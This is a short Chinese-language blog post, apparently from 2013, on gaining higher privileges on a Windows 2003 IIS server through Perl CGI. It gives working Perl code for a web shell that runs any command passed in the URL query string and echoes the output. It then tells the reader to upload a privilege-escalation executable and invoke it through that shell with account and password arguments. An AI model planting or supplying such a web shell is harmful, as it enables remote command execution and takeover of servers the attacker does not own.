CGI PL PERL脚本 提权

windows 2003 下,安装ActivePerl-5.16.2.1602-MSWin32-x86-296513

 

IIS 添加CGI支持。并在对应网站配置下面,添加CGI后缀或PL后缀 与 对应的perlis.dll

 

此时,网站支持HTTP访问CGI 或者 .pl脚本。

 

可以用来提取,.CGI .PL权限比较大,大于ASPX。

 

首先上传CGI 提权执行脚本:

#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
View Code

 

 

上传个提权EXE。 访问http://www.xxx.com/cmd.cgi?D:\www\seru_v.exe -u zhanghu -p mima 形式提权

posted @ 2013-08-28 23:10  群叔  阅读(711)  评论(0编辑  收藏  举报